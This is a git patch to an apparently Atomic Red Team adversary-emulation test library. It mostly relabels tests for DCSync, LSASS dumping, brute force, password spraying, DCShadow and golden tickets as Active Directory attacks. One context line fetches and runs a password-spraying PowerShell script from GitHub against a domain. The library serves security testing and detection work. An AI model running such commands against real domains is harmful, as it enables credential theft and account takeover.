From 1a4c4a97d28d06f90fefe8d6efced4e53f657c64 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Cl=C3=A9ment=20Notin?= <cnotin@tenable.com>
Date: Wed, 7 Jul 2021 19:38:22 +0200
Subject: [PATCH] Improve discoverability of "Active Directory" attacks (#1544)

---
 atomics/T1003.006/T1003.006.yaml |  6 +++---
 atomics/T1055/T1055.yaml         |  1 +
 atomics/T1110.001/T1110.001.yaml | 12 ++++++------
 atomics/T1110.003/T1110.003.yaml |  4 ++--
 atomics/T1207/T1207.yaml         |  4 ++--
 atomics/T1558.001/T1558.001.yaml |  6 +++---
 6 files changed, 17 insertions(+), 16 deletions(-)

diff --git a/atomics/T1003.006/T1003.006.yaml b/atomics/T1003.006/T1003.006.yaml
index f7e13487..dd51330f 100644
--- a/atomics/T1003.006/T1003.006.yaml
+++ b/atomics/T1003.006/T1003.006.yaml
@@ -1,10 +1,10 @@
 attack_technique: T1003.006
 display_name: "OS Credential Dumping: DCSync"
 atomic_tests:
-- name: DCSync
+- name: DCSync (Active Directory)
   auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e
   description: |
-    Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
+    Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
     Works against a remote Windows Domain Controller using the replication protocol.
     Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
     [Reference](https://adsecurity.org/?p=1729)
@@ -12,7 +12,7 @@ atomic_tests:
     - windows
   input_arguments:
     domain:
-      description: Targeted domain
+      description: Targeted Active Directory domain
       type: string
       default: example.com
     user:
diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml
index cfb0bf62..d2fefd94 100644
--- a/atomics/T1055/T1055.yaml
+++ b/atomics/T1055/T1055.yaml
@@ -34,6 +34,7 @@ atomic_tests:
   auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83
   description: |
     Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
+    Especially useful against domain controllers in Active Directory environments.
     It must be executed in the context of a user who is privileged on remote `machine`.
 
     The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>
diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml
index 3cd7f88a..5601e6b1 100644
--- a/atomics/T1110.001/T1110.001.yaml
+++ b/atomics/T1110.001/T1110.001.yaml
@@ -1,10 +1,10 @@
 attack_technique: T1110.001
 display_name: 'Brute Force: Password Guessing'
 atomic_tests:
-- name: Brute Force Credentials of all domain users via SMB
+- name: Brute Force Credentials of all Active Directory domain users via SMB
   auto_generated_guid: 09480053-2f98-4854-be6e-71ae5f672224
   description: |
-    Creates username and password files then attempts to brute force on remote host
+    Creates username and password files then attempts to brute force Active Directory accounts on remote host
   supported_platforms:
   - windows
   input_arguments:
@@ -21,7 +21,7 @@ atomic_tests:
       type: String
       default: '\\COMPANYDC1\IPC$'
     domain:
-      description: Domain name of the target system we will brute force upon
+      description: Active Directory domain name of the target system we will brute force upon
       type: String
       default: YOUR_COMPANY
   executor:
@@ -35,10 +35,10 @@ atomic_tests:
     cleanup_command: |-
       del #{input_file_users}
       del #{input_file_passwords}
-- name: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos)
+- name: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)
   auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250
   description: |
-    Attempt to brute force domain user on a domain controller, via LDAP, with NTLM or Kerberos
+    Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos
   supported_platforms:
   - windows
   input_arguments:
@@ -51,7 +51,7 @@ atomic_tests:
       type: String
       default: Password1`n1q2w3e4r`nPassword!
     domain:
-      description: Domain FQDN
+      description: Active Directory domain FQDN
       type: String
       default: contoso.com
     auth:
diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index 79d64c86..91636453 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -55,10 +55,10 @@ atomic_tests:
     command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
-- name: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos)
+- name: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)
   auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d
   description: |
-    Attempt to brute force all domain user with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos
+    Attempt to brute force all Active Directory domain users with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos
 
     Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users)
   supported_platforms:
diff --git a/atomics/T1207/T1207.yaml b/atomics/T1207/T1207.yaml
index 3fbd337d..7f38b3be 100644
--- a/atomics/T1207/T1207.yaml
+++ b/atomics/T1207/T1207.yaml
@@ -1,10 +1,10 @@
 attack_technique: T1207
 display_name: Rogue Domain Controller
 atomic_tests:
-- name: DCShadow - Mimikatz
+- name: DCShadow (Active Directory)
   auto_generated_guid: 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6
   description: |
-    Use Mimikatz DCShadow method to simulate behavior of a Domain Controller and edit protected attribute.
+    Use Mimikatz DCShadow method to simulate behavior of an Active Directory Domain Controller and edit protected attribute.
 
     [DCShadow](https://www.dcshadow.com/)
     [Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html)
diff --git a/atomics/T1558.001/T1558.001.yaml b/atomics/T1558.001/T1558.001.yaml
index 2c5ba55e..883b1fd4 100644
--- a/atomics/T1558.001/T1558.001.yaml
+++ b/atomics/T1558.001/T1558.001.yaml
@@ -1,10 +1,10 @@
 attack_technique: T1558.001
 display_name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
 atomic_tests:
-- name: Crafting golden tickets with mimikatz
+- name: Crafting Active Directory golden tickets with mimikatz
   auto_generated_guid: 9726592a-dabc-4d4d-81cd-44070008b3af
   description: |
-    Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the domain.
+    Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.
     This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
     The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
   supported_platforms:
@@ -15,7 +15,7 @@ atomic_tests:
       type: string
       default: S-1-5-21-DEFAULT
     domain:
-      description: Targeted domain FQDN
+      description: Targeted Active Directory domain FQDN
       type: string
       default: example.com
     account: